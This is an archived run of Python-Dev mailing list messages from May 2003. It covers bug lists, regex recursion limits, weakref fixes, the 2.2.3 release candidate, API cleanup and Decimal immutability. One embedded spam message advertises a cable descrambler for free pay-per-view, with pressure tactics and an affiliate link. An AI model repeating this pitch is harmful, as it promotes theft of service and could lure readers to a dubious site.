strange warnings messages in interpreter (2003-03-14)
	http://python.org/sf/703779
build of html docs broken (liboptparse.tex) (2003-05-04)
	http://python.org/sf/732174
HP-UX support for unixccompiler.py (2003-05-20)
	http://python.org/sf/740301
add urldecode() method to urllib (2003-05-20)
	http://python.org/sf/740827
unicode "support" for shlex.py (2003-05-23)
	http://python.org/sf/742290
SocketServer timeout, zombies (2003-05-23)
	http://python.org/sf/742598
ast-branch: msvc project sync (2003-05-23)
	http://python.org/sf/742621
check for true in diffrent paths, -pthread support (2003-05-24)
	http://python.org/sf/742741
Ordering of handlers in urllib2 (2003-05-24)
	http://python.org/sf/742823

Closed Bugs
-----------

crash in shelve module (2001-03-13)
	http://python.org/sf/408271
maximum recursion limit exceeded (2.1) (2001-04-24)
	http://python.org/sf/418626
raw-unicode-escape codec fails roundtrip (2001-07-25)
	http://python.org/sf/444514
strange IRIX test_re/test_sre failure (2001-08-28)
	http://python.org/sf/456398
New httplib lacks documentation (2001-09-04)
	http://python.org/sf/458447
maximum recursion limit exceeded in match (2001-12-14)
	http://python.org/sf/493252
inconsistent behavior of __getslice__ (2002-05-24)
	http://python.org/sf/560064
Mixing framework and static Pythons (2002-06-19)
	http://python.org/sf/571343
inheriting from property and docstrings (2002-07-03)
	http://python.org/sf/576990
unittest.py, better error message (2002-07-30)
	http://python.org/sf/588825
installation errors (2002-08-07)
	http://python.org/sf/592161
test_nis test fails on TRU64 5.1 (2002-08-14)
	http://python.org/sf/594998
non greedy match bug (2002-08-30)
	http://python.org/sf/602444
cgitb tracebacks not accessible (2002-08-31)
	http://python.org/sf/602893
faster [None]*n or []*n (2002-09-04)
	http://python.org/sf/604716
Max recursion limit with "*?" pattern (2002-10-08)
	http://python.org/sf/620412
cStringIO().write TypeError (2002-11-08)
	http://python.org/sf/635814
inspect.getargspec: None instead of () (2002-11-12)
	http://python.org/sf/637217
zlib.decompressobj under-described. (2002-11-18)
	http://python.org/sf/640236
Poor error message for augmented assign (2002-11-26)
	http://python.org/sf/644345
gettext.py crash on bogus preamble (2002-12-24)
	http://python.org/sf/658233
BoundaryError: multipart message with no defined boundary (2003-01-14)
	http://python.org/sf/667931
bsddb doc error (2003-01-28)
	http://python.org/sf/676233
test_logging fails (2003-01-31)
	http://python.org/sf/678217
new.function() leads to segfault (2003-02-25)
	http://python.org/sf/692776
Python 2.3a2 Build fails on HP-UX11i (2003-02-27)
	http://python.org/sf/694431
Several objects don't decref tmp on failure in subtype_new (2003-03-14)
	http://python.org/sf/703666
strange warnings messages in interpreter (2003-03-14)
	http://python.org/sf/703779
Assertion  failed, python aborts (2003-03-17)
	http://python.org/sf/705231
Error when using PyZipFile to create archive (2003-03-17)
	http://python.org/sf/705295
Minor nested scopes doc issues (2003-04-06)
	http://python.org/sf/716168
Uthread problem - Pipe left open (2003-04-08)
	http://python.org/sf/717614
Mac OS X painless compilation (2003-04-11)
	http://python.org/sf/719549
runtime_library_dirs broken under OS X (2003-04-17)
	http://python.org/sf/723495
email/quopriMIME.py exception on int (lstrip) (2003-04-20)
	http://python.org/sf/724621
Possible OSX module location bug (2003-04-21)
	http://python.org/sf/725026
comparing versions - one a float (2003-04-28)
	http://python.org/sf/729317
Lambda functions in list comprehensions (2003-05-08)
	http://python.org/sf/734869
FILEMODE not honoured (2003-05-09)
	http://python.org/sf/735274
Command line timeit.py sets sys.path badly (2003-05-09)
	http://python.org/sf/735293
csv.Sniffer docs need updating (2003-05-15)
	http://python.org/sf/738471
On Windows, os.listdir() throws incorrect exception (2003-05-15)
	http://python.org/sf/738617
array.insert and negative indices (2003-05-17)
	http://python.org/sf/739313

Closed Patches
--------------

Optional output streams for dis (2003-02-08)
	http://python.org/sf/683074
Add copyrange method to array. (2003-04-14)
	http://python.org/sf/721061


From andymac@bullseye.apana.org.au  Sun May 25 01:35:18 2003
From: andymac@bullseye.apana.org.au (Andrew MacIntyre)
Date: Sun, 25 May 2003 10:35:18 +1000 (EST)
Subject: [Python-Dev] _sre changes
In-Reply-To: <20030524152612.GA22309@ibook.distro.conectiva>
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl> <3ECE3677.1030500@python.org>
 <20030524152612.GA22309@ibook.distro.conectiva>
Message-ID: <20030525102158.S40394@bullseye.apana.org.au>

On Sat, 24 May 2003, Gustavo Niemeyer wrote:

> to backport some of the fixes we have introduced in the regular
> expression engine in 2.3 to 2.2.3, or is it too late? We have a sf patch
> open about that, but I'd like to port only the changes that don't
> require major changes in the engine.

These sre changes are giving me fits on FreeBSD.  The fix (recursion
limit down to 7500 for gcc 3.x) applied for 2.3b1 now needs to be extended
to gcc 2.95, and the limit for gcc 3.x lowered further - not a
particularly satisfactory outcome.

I have identified that the problem is not the compiler specifically, but
an interaction with FreeBSD's pthreads implementation (libc_r) -
./configure --without-threads produces an interpreter which survives
test_re with a recursion limit of 10000 regardless of compiler.

I'm still trying to frame a query to a FreeBSD forum about this.

--
Andrew I MacIntyre                     "These thoughts are mine alone..."
E-mail: andymac@bullseye.apana.org.au  (pref) | Snail: PO Box 370
        andymac@pcug.org.au             (alt) |        Belconnen  ACT  2616
Web:    http://www.andymac.org/               |        Australia


From mwh@python.net  Sun May 25 17:27:22 2003
From: mwh@python.net (Michael Hudson)
Date: Sun, 25 May 2003 17:27:22 +0100
Subject: [Python-Dev] _sre changes
In-Reply-To: <20030525102158.S40394@bullseye.apana.org.au> (Andrew
 MacIntyre's message of "Sun, 25 May 2003 10:35:18 +1000 (EST)")
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl>
 <3ECE3677.1030500@python.org>
 <20030524152612.GA22309@ibook.distro.conectiva>
 <20030525102158.S40394@bullseye.apana.org.au>
Message-ID: <2md6i7gff9.fsf@starship.python.net>

Andrew MacIntyre <andymac@bullseye.apana.org.au> writes:

> On Sat, 24 May 2003, Gustavo Niemeyer wrote:
>
>> to backport some of the fixes we have introduced in the regular
>> expression engine in 2.3 to 2.2.3, or is it too late? We have a sf patch
>> open about that, but I'd like to port only the changes that don't
>> require major changes in the engine.
>
> These sre changes are giving me fits on FreeBSD.  The fix (recursion
> limit down to 7500 for gcc 3.x) applied for 2.3b1 now needs to be extended
> to gcc 2.95, and the limit for gcc 3.x lowered further - not a
> particularly satisfactory outcome.
>
> I have identified that the problem is not the compiler specifically, but
> an interaction with FreeBSD's pthreads implementation (libc_r) -
> ./configure --without-threads produces an interpreter which survives
> test_re with a recursion limit of 10000 regardless of compiler.

This is to be expected.  If you run a threads disabled Python with
ulimit -s you can recurse until you run out of VIRTUAL MEMORY!

When there are threads in the picture is significantly more
complex... (which is another way of stating that I don't understand
it, but you can understand that with multiple stacks you can't just
say "here's a really high address, work down from here"[1]).

Cheers,
M.

[1] or vice versa depending on architecture.

-- 
    -Dr. Olin Shivers,
     Ph.D., Cranberry-Melon School of Cucumber Science
                                           -- seen in comp.lang.scheme


From tim_one@email.msn.com  Sun May 25 18:10:42 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sun, 25 May 2003 13:10:42 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
In-Reply-To: <000201c3228a$73b3cba0$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPLEKAB.tim_one@email.msn.com>

[Raymond Hettinger]
> Okay, you've had a second review on the patch and backporting
> to 2.2.3 is reasonable.  Please add a news item for the two changes
> in behavior.

I'll wait for Fred to get back.  I'm not sure you've used weakrefs <wink>.

> BTW, I wasn't trying to be difficult, I was starting from the
> presumption that Fred wasn't smoking dope when he put in that weird
> block of code. Looks like the presumption was wrong ;-)

That's cool, I started from them same presumption, and am still not entirely
over it -- it was such an outrageously inefficient way to delete a key that
the suspicion still nags there was *some* reason for it (other than really
good dope <wink>).



From tim_one@email.msn.com  Sun May 25 18:17:22 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sun, 25 May 2003 13:17:22 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
In-Reply-To: <000901c3228c$74f0a680$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEPMEKAB.tim_one@email.msn.com>

[Raymond Hettinger]
> Arghh.  One more example always arises after going to bed.
>
> The original required only equality.  The new version requires
> equality, hashability, *and* weak referencability.

It always required (and still does) all three for __setitem__ and
__getitem__:  key equality and hashability are required for all dicts, and
*of course* key weak referencability is required for a weak-keyed dict:
that's why it's called a weak-keyed dict <0.5 wink>.

__delitem__ alone used a bizarre algorithm, and indeed one that broke other
normal dict invariants such as that

    del d[k]

always deletes the same (key, value) pair that

    d[k] = v

would have replaced.



From Jack.Jansen@cwi.nl  Sun May 25 21:55:11 2003
From: Jack.Jansen@cwi.nl (Jack Jansen)
Date: Sun, 25 May 2003 22:55:11 +0200
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <3ECE3677.1030500@python.org>
Message-ID: <2D0200D5-8EF3-11D7-AA7E-000A27B19B96@cwi.nl>

On vrijdag, mei 23, 2003, at 16:55 Europe/Amsterdam, Barry Warsaw wrote:
>> Is there a chance I could get #723495 still in before 2.2.3 final? I 
>> was also hoping to find a fix for #571343, but I don't have a patch 
>> yet (although I'll try to get one up in the next few hours).
>
> I think it would be fine to get these into 2.2.3 final.

Okay, I'm done (in as far as the unix distribution is concerned): 
723495 is checked in, and 571343 I've closed as "won't fix" because it 
turns out that the trouble-case I expected is very unlikely to happen.
--
- Jack Jansen        <Jack.Jansen@oratrix.com>        
http://www.cwi.nl/~jack -
- If I can't dance I don't want to be part of your revolution -- Emma 
Goldman -



From gward@python.net  Mon May 26 03:16:35 2003
From: gward@python.net (Greg Ward)
Date: Sun, 25 May 2003 22:16:35 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
Message-ID: <20030526021635.GA15814@cthulhu.gerg.ca>

Currently, oss_audio_device objects have a setparameters() method with a
rather silly interface:

  oss.setparameters(sample_rate, sample_size, num_channels, format [, emulate])

This is silly because 1) 'sample_size' is implicit in 'format', and 2)
the implementation doesn't actually *use* sample_size for anything -- it
just checks that you have passed in the correct sample size, ie. if you
specify an 8-bit format, you must pass sample_size=8.  (This is code
inherited from linuxaudiodev that I never got around to cleaning up.)

In addition to being silly, this is not the documented interface.  The
docs don't mention the 'sample_size' argument at all.  Presumably the
doc writer realized the silliness and was going to pester me to remove
'sample_size', but never got around to it.  (Lot of that going around.)

So, even though we're in a beta cycle, am I allowed to change the code
so it's 1) sensible and 2) consistent with the documentation?

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
Sure, I'm paranoid... but am I paranoid ENOUGH?


From guido@python.org  Mon May 26 07:39:59 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 26 May 2003 02:39:59 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
In-Reply-To: "Your message of Sun, 25 May 2003 22:16:35 EDT."
 <20030526021635.GA15814@cthulhu.gerg.ca>
References: <20030526021635.GA15814@cthulhu.gerg.ca>
Message-ID: <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net>

> Currently, oss_audio_device objects have a setparameters() method with a
> rather silly interface:
> 
>   oss.setparameters(sample_rate, sample_size, num_channels, format [, emulate])
> 
> This is silly because 1) 'sample_size' is implicit in 'format', and 2)
> the implementation doesn't actually *use* sample_size for anything -- it
> just checks that you have passed in the correct sample size, ie. if you
> specify an 8-bit format, you must pass sample_size=8.  (This is code
> inherited from linuxaudiodev that I never got around to cleaning up.)
> 
> In addition to being silly, this is not the documented interface.  The
> docs don't mention the 'sample_size' argument at all.  Presumably the
> doc writer realized the silliness and was going to pester me to remove
> 'sample_size', but never got around to it.  (Lot of that going around.)
> 
> So, even though we're in a beta cycle, am I allowed to change the code
> so it's 1) sensible and 2) consistent with the documentation?

Yes.  I like silliness in a MP skit, but not in my APIs. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From 5p6vkvf4cr3@juno.com  Mon May 26 15:50:59 2003
From: 5p6vkvf4cr3@juno.com (Billie Dempsey)
Date: Mon, 26 May 03 14:50:59 GMT
Subject: [Python-Dev] Re: Free Digital Cable TV cgecprano y wofkg
Message-ID: <kw30g6h64$56v2$$z8$6@2npfk>

This is a multi-part message in MIME format.

--91_C___54E
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Get Free Cable TV Pay-Per-Views for only $45 now!


That's right, most sites are selling this amazing
digital filter descrambler for $100+. We are offering a limited deal
for less than $45 a filter!

Think about the $1000's you will save in Free Tv for
only $45.

Is there a catch? No. The only factor is that you need
digital cable. 
If you do not have it then simply upgrade & you'll be
saving $100's a month in Free events & Movies!

*Bonus: Get a Free cell/cordless Phone Shield/Booster
with your order! A $20 value FREE with order.

ACT NOW !!!


Click Here as offer expires soon-->  
http://www.b2nmghjt.com/xcart/customer/product.php?productid=3D16144&partn=
er=3Daffil10&r=3Dcable1




















""OPT-OUT"" system in compliance with state laws. If
you wish to 
"OPT-OUT" from this mailing as well as the lists of
thousands of other email 
providers please visit http://www.b2nmghjt.com/1/

1
fakdbk u
z
z
olfrlbsyv spal
ag
eu
ynq
vgnnadhpz jp
gr ds dtgmzfn lg f
--91_C___54E--



From g9robjef@cdf.toronto.edu  Mon May 26 17:51:05 2003
From: g9robjef@cdf.toronto.edu (Jeffery Roberts)
Date: Mon, 26 May 2003 12:51:05 -0400 (EDT)
Subject: [Python-Dev] Re: Introduction
In-Reply-To: <20030523143901.8660.97348.Mailman@mail.python.org>
References: <20030523143901.8660.97348.Mailman@mail.python.org>
Message-ID: <Pine.LNX.4.55.0305261237120.23128@seawolf.cdf>

Thanks for that reply Brett. It is really helpful.

I'm currently in Ottawa at the GCC summit trying to sponge some knowledge
but I will begin following your advice when I get back home later this
week.

Thanks again !

Jeff

> I know I learned a lot from working on patches and bugs.  It especially
> helps if you jump in on a patch that is being actively worked on and can
> ask how something works.  Otherwise just read the source until your eyes
>   bleed and curse anyone who doesn't write extensive documentation for
> code.  =3D)
>
> There also has been mention of the AST branch.  I know I plan on working
> on that after I finish going through the bug and patch backlog.  Only
> trouble is that the guys who actually fully understand it (Jeremy, Tim,
> and Neal) are rather busy so it is going to be a "jump in the pool and
> drown and hope your flailing manages to at least generate something
> useful but you die and come back in another life wiser and able to
> attempt again until you stop drowning and manage to only get sick from
> gulping down so much chlorinated water".  =3D)
>
>  >  Check out
>  >
>  >     http://www.python.org/dev/
>  >
>  > for orientation, and leave your spare time at the door <wink>.
>  >
>
> I will vouch for the loss of spare time.  This has become a job.  Best
> job ever, though.  =3D)
>
> The only big piece of advice I can offer is to just make sure you are
> nice and cordial on the list; there is a low tolerance for jerks here.
> Don't take this as meaning to not take a stand on an issue!  All I am
> saying is realize that email  does not transcribe humor perfectly and
> until the list gets used to your personal writing style you  might have
> to just make sure  what you write does not come off as insulting.
>
> -Brett
>
>
>
> --__--__--
>
> Message: 9
> Date: Thu, 22 May 2003 20:21:20 -0700
> From: "Brett C." <bac@OCF.Berkeley.EDU>
> Reply-To: drifty@alum.berkeley.edu
> To: Jeffery Roberts <g9robjef@cdf.toronto.edu>
> CC: Tim Peters <tim.one@comcast.net>, python-dev@python.org
> Subject: Re: [Python-Dev] Introduction
>
> Jeffery Roberts wrote:
> > Thanks for all of your replies.  The front-end rewrite sounds especiall=
y
> > interesting. I'm going to look into that.  Is the entire front end
> > changing (ie scan/parse/ast) or just the AST structure ?
> >
> > If you have any more information or directions please let me know.
> >
>
> It is just a new AST.  Redoing/replacing pgen is something else
> entirely.  =3D)
>
> The branch that this is being developed under in CVS is ast-branch.
> There is a incomplete README in Python/compile.txt that explains the
> basic idea and direction.
>
> -Brett
>
>
>
> --__--__--
>
> Message: 10
> Date: Thu, 22 May 2003 23:30:45 -0400
> Cc: python-list@python.org, python-dev@python.org
> To: python-announce@python.org
> From: Barry Warsaw <barry@python.org>
> Subject: [Python-Dev] RELEASED Python 2.2.3c1
>
> I'm happy to announce the release of Python 2.2.3c1 (release candidate
> 1).  This is a bug fix release for the stable Python 2.2 code line.
> Barring any critical issues, we expect to release Python 2.2.3 final by
> this time next week.  We encourage those with an interest in a solid
> 2.2.3 release to download this candidate and test it on their code.
>
> The new release is available here:
>
> =09http://www.python.org/2.2.3/
>
> Python 2.2.3 has a large number of bug fixes and memory leak patches.
> For full details, see the release notes at
>
> =09http://www.python.org/2.2.3/NEWS.txt
>
> There are a small number of minor incompatibilities with Python 2.2.2;
> for details see:
>
> =09http://www.python.org/2.2.3/bugs.html
>
> Perhaps the most important is that the Bastion.py and rexec.py modules
> have been disabled, since we do not deem them to be safe.
>
> As usual, a Windows installer and a Unix/Linux source tarball are made
> available, as well as tarballs of the documentation in various forms.
> At the moment, no Mac version or Linux RPMs are available, although I
> expect them to appear soon after 2.2.3 final is released.
>
> On behalf of Guido, I'd like to thank everyone who contributed to this
> release, and who continue to ensure Python's success.
>
> Enjoy,
> -Barry
>
>
>
> --__--__--
>
> Message: 11
> Date: Fri, 23 May 2003 13:42:20 +0200
> Subject: Re: [Python-Dev] RELEASED Python 2.2.3c1
> Cc: python-dev@python.org
> To: Barry Warsaw <barry@python.org>
> From: Jack Jansen <Jack.Jansen@cwi.nl>
>
>
> On Friday, May 23, 2003, at 05:30 Europe/Amsterdam, Barry Warsaw wrote:
>
> > I'm happy to announce the release of Python 2.2.3c1 (release candidate
> > 1).
>
> Oops, that suddenly went *very* fast, I though I had until the
> weekend...
>
> Is there a chance I could get #723495 still in before 2.2.3 final? I
> was also hoping to find a fix for #571343, but I don't have a patch yet
> (although I'll try to get one up in the next few hours).
> --
> Jack Jansen, <Jack.Jansen@cwi.nl>, http://www.cwi.nl/~jack
> If I can't dance I don't want to be part of your revolution -- Emma
> Goldman
>
>
>
> --__--__--
>
> Message: 12
> Date: Fri, 23 May 2003 09:11:35 -0400
> From: Guido van Rossum <guido@python.org>
> Subject: Re: [Python-Dev] Of what use is commands.getstatus()
> To: skip@pobox.com
> Cc: python-dev@python.org
>
> > I was reading the docs for the commands module and noticed getstatus() =
seems
> > to be completely unrelated to getstatusoutput() and getoutput().  I tho=
ught,
> > "I'll correct the docs.  They must be wrong."  Then I looked at command=
s.py
> > and saw the docs are correct.  It's the function definition which is we=
ird.
> > Of what use is it to return 'ls -ld file'?  Based on its name I would h=
ave
> > guessed its function was
> >
> >     def getoutput(cmd):
> >         """Return status of executing cmd in a shell."""
> >         return getstatusoutput(cmd)[0]
> >
> > This particular function dates from 1990, so it clearly can't just be
> > deleted, but it seems completely superfluous to me, especially given th=
e
> > existence of os.stat, os.listdir, etc.  Should it be deprecated or modi=
fied
> > to do (what I think is) the obvious thing?
>
> That whole module wasn't thought out very well.  I recently tried to
> use it and found that the strip of the trailing \n on getoutput() is
> also a counterproductive feature.  I suggest that someone should
> design a replacement, perhaps to live in shutil, and then we can
> deprecate it.  Until then I would leave it alone.  Certainly don't
> "fix" it by doing something incompatible.
>
> --Guido van Rossum (home page: http://www.python.org/~guido/)
>
>
>
> --__--__--
>
> Message: 13
> Date: Fri, 23 May 2003 10:06:05 -0400
> From: Guido van Rossum <guido@python.org>
> Subject: Re: [Python-Dev] Descriptor API
> To: =3D?iso-8859-1?Q?Gon=3DE7alo_Rodrigues?=3D <op73418@mail.telepac.pt>
> Cc: python-dev@python.org
>
> > I was doing some tricks with metaclasses and descriptors in Python 2.2 =
and
> > stumbled on the following:
> >
> > >>> class test(object):
> > ...     a =3D property(lambda: 1)
> > ...
> > >>> print test.a
> > <property object at 0x01504D20>
> > >>> print test.a.__set__
> > <method-wrapper object at 0x01517220>
> > >>> print test.a.fset
> > None
> >
> > What this means in practice, is that if I want to test if a
> > descriptor is read-only I have to have two tests: One for custom
> > descriptors, checking that getting __set__ does not barf and another
> > for property, checking that fset returns None.
>
> Why are you interested in knowing whether a descriptor is read-only?
>
> > So, why doesn't getting __set__  raise AttributeError in the above case=
?
>
> This is a feature.  The presence of __set__ (even if it always raises
> AttributeError when *called*) signals this as a "data descriptor".
> The difference between data descriptors and others is that a data
> descriptor can not be overridden by putting something in the instance
> dict; a non-data descriptor can be overridden by assignment to an
> instance attribute, which will store a value in the instance dict.
>
> For example, a method is a non-data descriptor (and the prevailing
> example of such).  This means that the following example works:
>
>   class C(object):
>       def meth(self): return 42
>
>   x =3D C()
>   x.meth()  # prints 42
>   x.meth =3D lambda: 24
>   x.meth()  # prints 24
>
> > Is this a bug? If it's not, it sure is a (minor) feature request
> > from my part :-)
>
> Because of the above explanation, the request cannot be granted.
>
> You can test the property's fset attribute however to tell whether a
> 'set' argument was passed to the constructor.
>
> --Guido van Rossum (home page: http://www.python.org/~guido/)
>
>
> --__--__--
>
> Message: 14
> From: =3D?iso-8859-1?Q?Gon=3DE7alo_Rodrigues?=3D <op73418@mail.telepac.pt=
>
> To: <python-dev@python.org>
> Subject: Re: [Python-Dev] Descriptor API
> Date: Fri, 23 May 2003 15:34:14 +0100
>
>
> ----- Original Message -----
> From: "Guido van Rossum" <guido@python.org>
> To: "Gon=E7alo Rodrigues" <op73418@mail.telepac.pt>
> Cc: <python-dev@python.org>
> Sent: Friday, May 23, 2003 3:06 PM
> Subject: Re: [Python-Dev] Descriptor API
>
>
> > > I was doing some tricks with metaclasses and descriptors in Python 2.=
2
> and
> > > stumbled on the following:
> > >
> > > >>> class test(object):
> > > ...     a =3D property(lambda: 1)
> > > ...
> > > >>> print test.a
> > > <property object at 0x01504D20>
> > > >>> print test.a.__set__
> > > <method-wrapper object at 0x01517220>
> > > >>> print test.a.fset
> > > None
> > >
> > > What this means in practice, is that if I want to test if a
> > > descriptor is read-only I have to have two tests: One for custom
> > > descriptors, checking that getting __set__ does not barf and another
> > > for property, checking that fset returns None.
> >
> > Why are you interested in knowing whether a descriptor is read-only?
> >
>
> Introspection dealing with a metaclass that injected methods in its
> instances depending on a descriptor. In other words, having fun with
> Python's wacky tricks.
>
> > > So, why doesn't getting __set__  raise AttributeError in the above ca=
se?
> >
> > This is a feature.  The presence of __set__ (even if it always raises
> > AttributeError when *called*) signals this as a "data descriptor".
> > The difference between data descriptors and others is that a data
> > descriptor can not be overridden by putting something in the instance
> > dict; a non-data descriptor can be overridden by assignment to an
> > instance attribute, which will store a value in the instance dict.
> >
> > For example, a method is a non-data descriptor (and the prevailing
> > example of such).  This means that the following example works:
> >
> >   class C(object):
> >       def meth(self): return 42
> >
> >   x =3D C()
> >   x.meth()  # prints 42
> >   x.meth =3D lambda: 24
> >   x.meth()  # prints 24
> >
> > > Is this a bug? If it's not, it sure is a (minor) feature request
> > > from my part :-)
> >
> > Because of the above explanation, the request cannot be granted.
> >
>
> Thanks for the reply (and also to P. Eby, btw). I was way off track when =
I
> sent the email, because it did not occured to me that property was a type
> implementing __get__ and __set__. With this piece of info connecting the
> dots the idea is just plain foolish.
>
> > You can test the property's fset attribute however to tell whether a
> > 'set' argument was passed to the constructor.
> >
> > --Guido van Rossum (home page: http://www.python.org/~guido/)
>
> With my best regards,
> G. Rodrigues
>
>
>
> --__--__--
>
> Message: 15
> Date: Fri, 23 May 2003 10:39:10 -0400
> From: Guido van Rossum <guido@python.org>
> Subject: Re: [Python-Dev] Need advice, maybe support
> To: Christian Tismer <tismer@tismer.com>
> Cc: python-dev@python.org
>
> > > The other is the new style where the PyMethodDef
> > > array is in tp_methods, and is scanned once by PyType_Ready.
> >
> > Right, again. Now, under the hopeful assumption that every
> > sensible extension module that has some types to publish also
> > does this through its module dictionary, I would have the
> > opportunity to cause PyType_Ready being called early enough
> > to modify the method table, before any of its methods is used
> > at all.
>
> Dangerous assumption!  It's not inconceivable that a class would
> instantiate some of its own classes as part of its module
> initialization.
>
> > > 3rd party modules that have been around for a while are likely to use
> > > Py_FindMethod.  With Py_FindMethod you don't have a convenient way to
> > > store the pointer to the converted table, so it may be better to
> > > simply check your bit in the first array element and then cast to a
> > > PyMethodDef or a PyMethodDefEx array based on what the bit says (you
> > > can safely assume that all elements of an array are the same size :-)=
=2E
> >
> > Hee hee, yeah. Of course, if there isn't a reliable way to
> > intercept method table access before the first Py_FindMethod
> > call, I could of course modify Py_FindMethod. For instance,
> > a modified, new-style method table might be required to always
> > start with a dummy entry, where the flags word is completely
> > -1, to signal having been converted to new-style.
>
> Why so drastic?  You could just set a reserved bit.f
>
> > ...
> >
> > >>If that approach is trustworthy, I also could drop
> > >>the request for these 8 bits.
> > >
> > > Sure.  Ah, a bit in the type would work just as well, and
> > > Py_FindMethod *does* have access to the type.
> >
> > You think of the definition in methodobject.c, as it is
> >
> > """
> > /* Find a method in a single method list */
> >
> > PyObject *
> > Py_FindMethod(PyMethodDef *methods, PyObject *self, char *name)
> > """
> >
> > , assuming that self always is not NULL, but representing a valid
> > object with a type, and this type is already referring to the
> > methods table?
>
> Right.  There is already code that uses self->ob_type in
> Py_FindMethodInChain(), which is called by Py_FindMethod().
>
> > Except for module objects, this seems to be right. I've run
> > Python against a lot of Python modules, but none seems
> > to call Py_FindMethod with a self parameter of NULL.
>
> I don't think it would be safe to do so.
>
> > If that is true, then I can patch a small couple of
> > C functions to check for the new bit, and if it's not
> > there, re-create the method table in place.
> > This is music to me ears. But...
> >
> > Well, there is a drawback:
> > I *do* need two bits, and I hope you will allow me to add this
> > second bit, as well.
> >
> > The one, first bit, tells me if the source has been compiled
> > with Stackless and its extension stuff. Nullo problemo.
> > I can then in-place modify the method table in a compatible
> > way, or leave it as it is, bny default.
> > But then, this isn't sufficient to set this bit then, like an
> > "everything is fine, now" relief. This is so, since this is *still*
> > an old module, and while its type's method tables have been
> > patched, the type is still not augmented by new slots, like
> > the new tp_call_nr slots (and maybe a bazillion to come, soon).
> > The drawback is, that I cannot simply replace the whole type
> > object, since type objects are not represented as object
> > pointers (like they are now, most of the time, in the dynamic
> > heaptype case), but they are constant struct addresses, where
> > the old C module might be referring to.
> >
> > So, what I think to need is no longer 9 bits, but two of them:
> > One that says "everything great from the beginning", and another
> > one that says "well, ok so far, but this is still an old object".
> >
> > I do think this is the complete story, now.
> > Instead of requiring nine bits, I'm asking for two.
> > But this is just *your options; I also can live with one bit,
> > but then I have to add a special, invalid method table entry
> > that just serves for this purpose.
> > In order to keep my souce code hack to the minimum, I'd really
> > like to ask for the two bits in the typeobject flags.
>
> OK, two bits you shall have.  Don't spend them all at once!
>
> > Thanks so much for being so supportive -- chris
>
> Anything to keep ctual stackless support out of the core. :-)
>
> --Guido van Rossum (home page: http://www.python.org/~guido/)
>
>
>
> --__--__--
>
> _______________________________________________
> Python-Dev mailing list
> Python-Dev@python.org
> http://mail.python.org/mailman/listinfo/python-dev
>
>
> End of Python-Dev Digest
>


From jacobs@penguin.theopalgroup.com  Mon May 26 18:22:08 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Mon, 26 May 2003 13:22:08 -0400 (EDT)
Subject: [Python-Dev] RE: Decimal class
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEEIELAB.tim_one@email.msn.com>
Message-ID: <Pine.LNX.4.44.0305261317360.15385-100000@penguin.theopalgroup.com>

On Mon, 26 May 2003, Tim Peters wrote:
> [Kevin Jacobs]
> > Anyhow, the next big thing I want to do is to make Decimal instances
> > immutable like other Python numeric types, so they can be used as
> > hash keys, so common values can be re-used, and some of the code can
> > be simplified.
> 
> Offhand I didn't see anything in the code that mutates any inputs, so I
> expect it's at worst close.  But this kind of discussion should be in
> public, so others can jump in too (especially Eric!).

I agree 100%.  Does anyone else have feelings for or against having mutable
Decimal instances?  In the mean time, I will prepare a patch to do this so
we can evaluate the practical effects on the code.

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com



From tim_one@email.msn.com  Mon May 26 18:36:23 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Mon, 26 May 2003 13:36:23 -0400
Subject: [Python-Dev] RE: Decimal class
In-Reply-To: <Pine.LNX.4.44.0305261317360.15385-100000@penguin.theopalgroup.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEEKELAB.tim_one@email.msn.com>

[Kevin Jacobs]
>>> Anyhow, the next big thing I want to do is to make Decimal instances
>>> immutable like other Python numeric types, so they can be used as
>>> hash keys, so common values can be re-used, and some of the code can
>>> be simplified.

[Tim]
>> Offhand I didn't see anything in the code that mutates any inputs,
>> so I expect it's at worst close.  But this kind of discussion should
>> be in public, so others can jump in too (especially Eric!).

[Kevin]
> I agree 100%.  Does anyone else have feelings for or against having
> mutable Decimal instances?  In the mean time, I will prepare a patch
> to do this so we can evaluate the practical effects on the code.

Oh yes, they have to be immutable, meaning that no public API operation
mutates a Decimal in a user-visible way.



From aahz@pythoncraft.com  Mon May 26 18:36:29 2003
From: aahz@pythoncraft.com (Aahz)
Date: Mon, 26 May 2003 13:36:29 -0400
Subject: [Python-Dev] RE: Decimal class
In-Reply-To: <Pine.LNX.4.44.0305261317360.15385-100000@penguin.theopalgroup.com>
References: <LNBBLJKPBEHFEDALKOLCCEEIELAB.tim_one@email.msn.com> <Pine.LNX.4.44.0305261317360.15385-100000@penguin.theopalgroup.com>
Message-ID: <20030526173629.GA27743@panix.com>

On Mon, May 26, 2003, Kevin Jacobs wrote:
>
> I agree 100%.  Does anyone else have feelings for or against having
> mutable Decimal instances?  In the mean time, I will prepare a patch
> to do this so we can evaluate the practical effects on the code.

I'm opposed to mutable Decimal instances because Uncle Timmy says so.  ;-)
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
